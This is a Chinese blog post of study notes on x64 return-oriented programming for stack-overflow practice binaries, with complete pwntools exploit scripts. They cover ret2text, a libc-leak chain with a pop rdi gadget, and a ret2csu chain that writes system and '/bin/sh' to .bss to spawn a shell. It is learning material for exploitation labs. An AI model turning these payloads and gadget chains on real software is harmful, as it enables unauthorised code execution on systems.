蒸米ROP_X64学习总结

最新推荐文章于 2022-04-15 16:48:32 发布
最新推荐文章于 2022-04-15 16:48:32 发布
阅读量1.9k 收藏 1
点赞数 2
文章标签: python linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Gtooler/article/details/120678708
版权

X86与X64

x86中参数都是存在栈上,但在x64中的前六个参数依次存在RDI,RSI,RDX,RCX,R8、R9中,如果还有更多的参数的话才会存在栈上

level3(ROP简单绕过NX)

Snipaste_2021-10-09_14-33-52

发现有栈溢出

找到system(/bin/sh)

请添加图片描述

把这个函数写入栈中就ok了 exp如下

#!/usr/bin/env python3
from pwn import *

p = process("./level3")

payload = b"a" * 136 + p64(0x0000000000400584)

p.sendline(payload)
p.interactive()

level4(ROPgadget寻找gadgets)

请添加图片描述

发现它会把system的地址发送出来,这样就可以求偏移offset,就可以得到binsh_addr字符串的真实地址,但因为x64前6个参数是存在寄存器中的,所以我们需要gadgets(pop ret这样的)来实现64位下ROP

可以用objdump去寻找,也可以用ROPgadget去找

我这题用的ROPgadget,输入如下命令

ROPgadget --binary level4 --only "pop|ret" | grep rdi

请添加图片描述

不过好像没找到需要的

但我们可以去调用的libc.so文件里面去找,老样子,先拷贝到桌面

ldd level4
sudo cp /lib/x86_64-linux-gnu/libc.so.6 libc.so

然后去找

Snipaste_2021-10-09_14-56-52

不过命令最好后面加上grep rdi,不然找出来一大堆,不好拿

exp如下

from pwn import *

libc = ELF('libc.so')

p = process('./level4')


pop_call_libc = 0x000000000012228f

system_addr_str = p.recvuntil('\n')
system_addr = int(system_addr_str, 16)
offset = system_addr - libc.symbols["system"]
binsh_addr = next(libc.search(b"/bin/sh")) + offset

pop_ret_addr = pop_call_libc + offset

p.recv()

payload = b"a"*136 + p64(pop_ret_addr) + p64(binsh_addr) + p64(system_addr)
p.send(payload)
p.interactive()

pop rdi ret 可以先把binsh_addrpop进rdi当第一个参数,然后ret调用system_addr,就完成了ROP的构造

level5(通用gadgets)

Snipaste_2021-10-09_15-11-23

这次啥也没有,就一个栈溢出,system()或其地址的辅助函数也全删掉了

但是有一个write函数,可以进行地址泄露,老套路了,前面都写过,不多写了,可以利用内存信息的泄露得到system函数的地址,然后把binsh写进bss段,老套路了也是

但X64下的传参是一个大问题,write一共三个参数要怎么传呢

第一次调用write来泄露地址,参数应该是这样write(rdi=1, rsi=write.got, rdx=4),把地址泄露出来,所以我们要去找对应的gadgets

但有时候ROPgadget并没有类似pop rdi, ret,pop rsi, ret…的gadgets

那这时候我们可以考虑一下x64下万能的gadgets

用指令objdump -d ./level5观察一波

一般情况,只要程序调用了libc.so,程序都会用__libc_csu_init()来对libc进行初始化操作

请添加图片描述

0x400606地址处的代码可以控制rbx,rbp,r12,r13,r14和r15的值,然后再利用0x4005f0处的代码,可以把r15的值给rdx, r14的值给rsi,r13的值给edi,然后call [r12+rbx*8],如果此时rbx为0,那么就相当于call r12,然后我们如果把rbx设为0,rbp的值设为1,rbx加1之后也是1,两个值相等,那么就不会跳转,然后继续执行到0x400628的ret处返回地址,我们把ret那里设置成main就ok

  • payload1(用write泄露地址)

我们先构造payload1,利用write(1,write_got,8)输出write在内存中的地址。注意我们的gadget是call r12,所以我们应该使用write.got而不是write.plt。并且为了返回到原程序中,应该重复利用栈溢出的漏洞,我们应该继续覆盖栈,让ret那里为main的地址

payload1 = b"\x00"*136
#rbx = 0
#rbp = 1
#r12 = write_got
#1 = rdi=  edi = r13, write.got = rsi = r14, 8 = rdx = r15 
#write(rdi=1, rsi=write.got, rdx=8)
payload1 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(write_got) + p64(1) + p64(write_got) + p64(8)
payload1 += p64(0x4005F0)
payload1 += b"\x00"*56
payload1 += p64(main)

因为末尾是一个add rsp,0x38 = 57,所以应该往里传7个,所以前面多个p64(0)

p64(0) +p64(0) + p64(1) + p64(write_got) + p64(1) + p64(write_got) + p64(8)

构造好payload1,就可以计算出system函数的真实地址

  • payload2(用read读取地址)

同理

#rbx = 0
#rbp = 1
#r12 = read_got
#0 = rdi=  edi = r13, write.got = rsi = r14, 8 = rdx = r15 
#read(rdi=0, rsi=bss_addr, rdx=16)
payload2 = b"\x00"*136
payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(read_got) + p64(0) + p64(bss_addr) + p64(16)
payload2 += p64(0x4005F0)
payload2 += b"\x00"*56
payload2 += p64(main)

构造好payload2就可以利用read去读取system()的地址以及binsh的地址

  • payload3(调用system函数)

最后构造payload3,调用system()函数执行binsh。注意,system()的地址保存在了bss段首地址上,binsh_addr保存在了bss段首地址+8的位置

#r12 = bss_addr
#bss_addr+8 = rdi =  edi = r13, 0 = rsi = r14, 0 = rdx = r15
#system(rdi=bss_addr+8=binsh)
payload3 = b"\x00"*136
payload3 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(bss_addr+8) + p64(0) + p64(0)
payload3 += p64(0x4005F0)#函数system已经执行完,下面两行有没有都行
# payload3 += b"\x00"*56
# payload3 += p64(main)

最终exp如下

#!/usr/bin/env python3
from pwn import *

elf = ELF('level5')
libc = ELF('libc.so.6')

p = process('./level5')

write_libc = libc.symbols['write']
write_got = elf.got['write']
read_got = elf.got['read']


main = 0x0400564

payload1 = b"\x00"*136
payload1 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(write_got) + p64(1) + p64(write_got) + p64(8)
payload1 += p64(0x4005F0)
payload1 += b"\x00"*56
payload1 += p64(main)

p.recvuntil(b"Hello, World\n")


p.send(payload1)
sleep(1)

write_addr = u64(p.recv(8))
offset = write_addr - libc.symbols['write']
system_addr = libc.symbols['system'] + offset


bss_addr = 0x601028

p.recvuntil(b"Hello, World\n")


payload2 = b"\x00"*136
payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(read_got) + p64(0) + p64(bss_addr) + p64(16)
payload2 += p64(0x4005F0)
payload2 += b"\x00"*56
payload2 += p64(main)

p.send(payload2)
sleep(1)

p.send(p64(system_addr))
p.send(b"/bin/sh\0")
sleep(1)

p.recvuntil(b"Hello, World\n")


payload3 = b"\x00"*136
payload3 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(bss_addr+8) + p64(0) + p64(0)
payload3 += p64(0x4005F0)#函数system已经执行完,下面两行有没有都行
# payload3 += b"\x00"*56
# payload3 += p64(main)



sleep(1)
p.send(payload3)

p.interactive()
gxhhh191
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
arm64_rop_exploit arm64 rop小工具二进制文件,用于将arm64反向外壳程序代码映射到内存中并执行代码这仅适用于目标arm64设备。 用于将rop小工具映射到内存中并从libc库执行shell代码的源代码。 在运行Ubuntu 18.04....
一步一步学 ROPlinux_x64 篇-level5
weixin_43489686的博客
02-02 1515
这道题是来自蒸米的一步一步学ROPlinux_x64篇中的level5,主要考察的是中级ROP中的__libc_csu_init。 原理 __libc_csu_init这个函数是用来对libc进行初始化操作的,一般的程序都会调用libc函数,所以一般都会有这个函数。 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000...
【逆向学习记录】学习《一步一步学ROP_x64
卦星的专栏
01-12 1063
1.概述 通过前面几篇文章,基本上搞定了x86的漏洞原理,针对x64的还需要进一步学习,依然利用最经典的当属蒸米大神的一步一步教学系列 一步一步学ROPlinux_x64篇 – 蒸米 环境:ubuntu 16.04 2.linux x86与x64的区别 这里引用一下上面文章中的语言: linux_64与linux_86的区别主要有两点: 1.首先是内存地址的范围由32位变成了64位。但是可以使用...
关于蒸米的一步一步学ROPlinux_x86的学习笔记
lingyuexueai的博客
08-12 1544
写在开头:level2没有源码,所以第二个“Ret2libc – Bypass DEP 通过ret2libc绕过DEP防护”做不动……另外socat还没学会用==,按照步骤输入命令后一直没反应,也不知道怎么办,所以后面的远程攻击也没法进行……于是只做了第一个Control Flow Hijack 程序流劫持 原文地址:http://jaq.alibaba.com/community/art/sh...
蒸米ROP_X86学习总结
Gtooler的博客
10-08 359
蒸米的相关附件感兴趣自行下载 学了点蒸米ROP笔记,自己来写个总结 ROP是啥 全称为Return-oriented programming,核心是利用ret指令控制执行顺序,作为一种高级的攻击内存的技术,可以绕过各种简单防御 关于X86 level1(栈上写入shellcode) Linux系统的ASLR会使内存里的地址随机化,可以先关掉 sudo -s echo 0 > /proc/sys/kernel/randomize_va_space exit ida打开会发现有个read函数可以进行
蒸米ROP学习笔记(一步一步学 ROPLinux_x86 篇)
niu_niu_的博客
04-15 2889
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
通过深入研究这个rop-sample项目,开发者不仅能学习ROP的基本原理和利用技巧,还能了解到如何在实际项目中结合Netty实现安全的网络通信。这对于提升网络安全意识和掌握高级安全技术具有重要意义。 总的来说,这个...
rop_matlab1.rar_数据结构_matlab_
08-11
通过学习这个压缩包中的内容,你不仅可以掌握BFS和最小生成树的基本概念,还能了解到如何在MATLAB环境下实现这些算法,从而加深对数据结构和图论的理解,并能应用于实际问题的求解。这无论是对学术研究还是工程实践...
STM8_Unlock_Flash_ROP_issue_ROPCLEAR_unlock_stm8s003_stm8s103_
10-03
在STM8S103型号中,涉及到的"Unlock Flash ROP issue"指的是在编程或擦除闪存时可能遇到的问题,尤其是与Read-Out Protection (ROP)功能有关的障碍。ROP是一种安全特性,它防止未经许可的读取和复制微控制器内部的...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
xgadget:快速,并行,互变式ROPJOP小工具搜索x86x64二进制文件
02-08
小工具 快速,并行,交叉变量的ROP / JOP小工具搜索x86(32位)和x64(64位)二进制文件。 使用。 当前状态:测试覆盖面不错,但仍处于测试阶段。 欢迎发行/ PR :)关于据我所知, xgadget是第一个具有以下功能的小...
rop_compiler, 在 python 中,一个开放源码的多体系结构.zip
09-18
rop_compiler, 在 python 中,一个开放源码的多体系结构 这个库包含我试图做一个有用的开源的多体系结构ROP编译器。 为此,有两个版本:基于pyvex的基于和CLEA的angr编译器。 这个源代码位于 pyrop/ 目录中。基于...
Rompmporium漏洞:ROP Emporium漏洞
02-15
ROP Emporium是一个在线平台,提供了一系列的挑战,旨在帮助安全研究人员和逆向工程师学习和实践ROP技术。 **什么是ROP(Return-Oriented Programming)?** ROP允许攻击者通过拼接一系列预先存在的、短小的指令...
rop轻松谈.pdf
10-21
ROP輕鬆談 ROP(Return Oriented Programming)是一種exploit技术,該技術通過在程式碼中注入惡意代碼,控制程式的執行流程,達到攻擊的目的。本文將對ROP技術進行詳細的介紹,涵蓋ROP的基本概念、Buffer Overflow...
Javris OJ - pwn level5(mmap和mprotect练习)(_libc_csu_init中的通用gedget的使用)
hanqdi_的博客
02-14 1741
pwn level5 这个题和level3-64的附件一样,level5要求不用system和execve,而是用mprotect和mmap,mmap主要是将文件映射到一段内存去同时设置那段内存的属性可读可写或者是可执行,mprotect函数是将从addr开始的地址 ,长度位len的内存的访问权限。 可以这样做:利用shellcode,利用read函数把shellcode写入bss段,这里要求写入...
一步一步学ROPlinux_x64
weixin_34204057的博客
11-07 278
一步一步学ROPlinux_x64篇 一、序 **ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。上次我们主要讨论了linux_x86的ROP攻击:《一步一步学ROPlinux_x86篇》,在这次的教程中我们会带来上...
蒸米一步一步ROP X64学习笔记
weixin_30359021的博客
06-12 1006
原文地址https://segmentfault.com/a/1190000007406442,源代码地址https://github.com/zhengmin1989/ROP_STEP_BY_STEP(冒昧的贴一下, 本文有一些作为一只菜鸡的思考,原文蒸米大大可能站的角度比较高,有的地方没有写清楚,这里权当补充一下 首先是level4,源代码如下 #include &l...
从o开始的pwn学习之ret2csu
jzc020121的博客
04-09 2879
ret2csu 前置知识 X64寄存器 我们知道,64位寄存器有RAX,RBX,RCX,RDX,RDI,RSI,RBP,RSP,R8,R9,R10,R11,R12,R13,R14,R15,而rdi,rsi,rdx,rcx,r8,r9便用来传递函数的前六个参数,如多于六个,便在放到栈里。 __libc_csu_init 一般的程序都会调用libc中的函数,而此函数便是来将libc初始化的,故此函数几乎是每一个程序所必备的。 gadget 我们在构造ROP链的时候,往往会用到能够给寄存器赋值的gadget,形如
arm64 的 rop示例
最新发布
03-31
在ARM64架构下,ROP攻击同样适用。 以下是一个ARM64的ROP示例,假设要利用一个漏洞,攻击一个运行在ARM64架构的程序: ```assembly .text main: // 在此处发现了漏洞,可以通过覆盖函数返回地址实现ROP攻击 // ....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值